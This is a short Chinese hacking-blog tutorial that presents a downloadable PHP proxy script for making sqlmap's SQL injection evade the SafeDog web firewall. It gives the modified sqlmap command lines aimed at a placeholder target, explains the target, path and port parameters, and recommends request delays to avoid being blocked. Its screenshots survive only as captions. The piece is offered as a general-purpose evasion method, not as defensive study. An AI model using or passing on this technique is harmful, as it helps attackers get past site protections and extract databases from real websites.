通用型sqlmap绕过安全狗注入辅助脚本

华盟原创文章投稿奖励计划

 

先来写个存在注入的页面(3.php):

通用型sqlmap绕过安全狗注入辅助脚本

先证明下,如图3-2-1,图3-2-2:

通用型sqlmap绕过安全狗注入辅助脚本

图  3-2-1

通用型sqlmap绕过安全狗注入辅助脚本

图  3-2-2

然后将本文件下载:http://pan.baidu.com/s/1hq9Zc7E。搭建php环境取得本文件地址为:http://www.a.com/dog/dogfuck.php (www.a.com 修改的本地host文件,与localhost 意义一样,也可以上传到自己web服务器使用方便)

与平时使用sqlmap注入不同的是 -u参数

* 平时:sqlmap.py -u “http://www.xxxx.com/3.php” –data “buff=1&sub=ok” –delay 5 -p “buff”  –dbs
* 现在:sqlmap.py -u “http://www.a.com/dog/dogfuck.php?target=www.xxxx.com&url=/3.php&port=80” –data “buff=1&sub=ok” –delay 5 -p “buff”  –dbs

* 3个参数:target-目标域名  url-域名下的具体路径 port-端口

* http://www.a.com/dog/dogfuck.php?target=www.xxxxxx.com&url=/3.php&port=80

* 注入的时候记得使用–delay 延时5秒左右,频率过快安全狗一样会拦截。

以下为测试截图,如图3-2-3:

通用型sqlmap绕过安全狗注入辅助脚本

图  3-2-3

然后在猜解表的字段数了,如图3-2-4~图3-2-5:

通用型sqlmap绕过安全狗注入辅助脚本

图  3-2-4

通用型sqlmap绕过安全狗注入辅助脚本

图  3-2-5

然后注入成功,如图3-2-6~图3-2-7:

通用型sqlmap绕过安全狗注入辅助脚本

图  3-2-6

通用型sqlmap绕过安全狗注入辅助脚本

图  3-2-7

看一下服务器狗,如图3-2-8~图3-2-9:

通用型sqlmap绕过安全狗注入辅助脚本

 

图  3-2-8

通用型sqlmap绕过安全狗注入辅助脚本

原文地址:https://hack.77169.com/201511/215842.shtm

本文原创,作者:华盟君,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/20309.html

发表回复